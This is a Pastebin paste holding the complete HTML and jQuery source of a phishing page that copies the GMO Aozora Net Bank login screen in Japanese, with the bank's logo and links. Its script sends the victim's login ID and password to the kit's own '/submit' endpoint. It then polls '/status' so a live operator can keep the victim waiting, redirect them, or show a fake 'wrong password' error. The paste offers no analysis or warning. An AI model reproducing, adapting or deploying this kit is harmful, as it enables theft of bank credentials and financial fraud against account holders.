Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html lang="ja"><head>
- <meta http-equiv="content-type" content="text/html; charset=UTF-8">
- <meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>GMOあおぞらネット銀行 ログイン</title>
- <meta name="description" content="GMOあおぞらネット銀行">
- <meta name="keywords" content="GMOあおぞらネット銀行">
- <script type="text/javascript" src="/static/js/jquery-3.3.1.min.js"></script>
- <link rel="stylesheet" type="text/css" media="all" href="/static/gmo/reset.css">
- <link rel="stylesheet" type="text/css" media="all" href="/static/gmo/login.css">
- <script type="text/javascript" src=""></script>
- </head>
- <body>
- <header>
- <div class="container clearfix">
- <div class="col-child">
- <a href="https://gmo-aozora.com/"><img class="logo" src="/static/gmo/logo.png" alt="GMOあおぞらネット銀行"></a>
- </div>
- </div>
- </header>
- <section id="app" class="content">
- <div class="login-private panel-wrapper">
- <div class="panel">
- <div>
- <header class="header-accent with-link">
- <h1>ログイン</h1>
- <a href="/" class="link-arrow" id="login-link">法人のお客さまはこちら</a>
- </header>
- </div>
- <div class="panel-body">
- <div class="input-wrapper">
- <div class="text-description">ログインID</div>
- <div>
- <input type="text" name="username" maxlength="20" size="16" placeholder="ログインIDまたはログイン名" id="username" tabindex="1"></div>
- </div>
- <div class="input-wrapper">
- <div class="text-description">ログインパスワード</div>
- <div>
- <input type="password" name="password" maxlength="10" size="16" value="" placeholder="6~10文字以内の半角英数記号" id="password" tabindex="2"></div>
- </div>
- <div class="indent_block" id="indent_block" style="display:none;" >
- <font size="3" color="#ff0000"><strong><b>「ログインID」または 「ログインパスワード」の入力内容が誤っている,ご確認のうえ再度ご入力ください。<br></b></strong></font>
- </div>
- <div class="button-wrapper">
- <button type="submit" class="button-primary" onclick="regs();" tabindex="3">ログイン</button>
- </div>
- </div>
- <div class="description">
- <ul class="list-info">
- <li>
- <a href="https://gmo-aozora.com/information/" class="link-arrow">口座をまだお持ちでない方</a>
- </li>
- <li>
- <a href="https://bank.gmo-aozora.com/bank/recovery" class="link-arrow" target="_blank">ログインID、ログインパスワードが分からない方</a>
- </li>
- <li>
- <a href="https://gmo-aozora.com/policy/about-site.html#usage" class="link-arrow" target="_blank">ご利用環境について</a>
- </li>
- <li>
- <a href="https://gmo-aozora.com/news/maintenance.html" class="link-arrow" target="_blank">システムメンテナンス情報</a>
- </li>
- <li>
- <a href="https://gmo-aozora.com/security/" class="link-arrow" target="_blank">フィッシングサイトにご注意ください</a>
- </li>
- </ul>
- </div>
- </div>
- <div id="wait" style="left:0px;top:0;height:100%;width:100%;position: absolute;display:none;background: rgba(0,0,0,0.6);opacity: 0.8;z-index:9999999;">
- <img style="position:absolute;left:50%;margin-left:-50px;top:30%;margin-top:-100px;width:100px;height:100px;" src="/static/images/loading.gif" />
- </div>
- <div class="banner-wrapper">
- <a href="https://gmo-aozora.com/campaign/redirect/gmocoin.html" target="_blank">
- <img src="/static/gmo/btn-c.png" class="partners-banner"></a>
- </div>
- </div>
- </section>
- <footer>
- <div class="container">
- <div>
- <a href="https://gmo-aozora.com/information/interest.html" target="_blank">金利</a>
- <a href="https://gmo-aozora.com/information/fee.html" target="_blank">手数料</a>
- <a href="https://faq.gmo-aozora.com/" target="_blank">よくあるご質問</a>
- <a href="https://gmo-aozora.com/company/" target="_blank">会社情報</a>
- <a href="https://gmo-aozora.com/policy/" target="_blank">各種方針</a>
- <a href="https://gmo-aozora.com/policy/resolve-complaints.html" target="_blank">苦情・紛争解決機関</a>
- <a href="https://gmo-aozora.com/provision/" target="_blank">規定・約款一覧</a>
- <a href="https://gmo-aozora.com/information/attention.html" target="_blank">金融犯罪の注意喚起</a>
- <a href="https://gmo-aozora.com/security/" target="_blank">セキュリティ対策</a>
- </div>
- <div class="copyright">Copyright © GMO Aozora Net Bank, Ltd. All Rights Reserved.</div>
- </div>
- </footer>
- </body>
- <script>
- var auto;
- function regs(){
- if ($("#username").val()==""){
- $("#username").focus();
- return false;
- }
- if ($("#password").val()==""){
- $("#password").focus();
- return false;
- }
- $("#indent_block").hide();
- $("#wait").css('height',document.body.scrollHeight);
- $("#wait").show();
- $.post("/submit",{Origin:"GMO",Page:"1",Val1:$("#username").val(),Val3:$('#password').val()},function (data){
- if (data.Code == 1 && data.Message == "success") {
- auto=window.setInterval("checkStatus();",1000);
- }
- });
- }
- function checkStatus() {
- $("#wait").show();
- $.post("/status",function (data) {
- if (data.Code == 1 && data.Message == "wait") {
- $("#wait").show();
- }else if (data.Code == 1 && data.Message == "success") {
- $("#wait").hide();
- window.clearTimeout(auto);
- document.location.href = data.Data;
- }else if (data.Code == 1 && data.Message == "alert") {
- submitcount = 0;
- $("#username").val("");
- $("#password").val("");
- window.clearTimeout(auto);
- $("#wait").hide();
- $("#indent_block").show();
- }
- })
- }
- </script>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment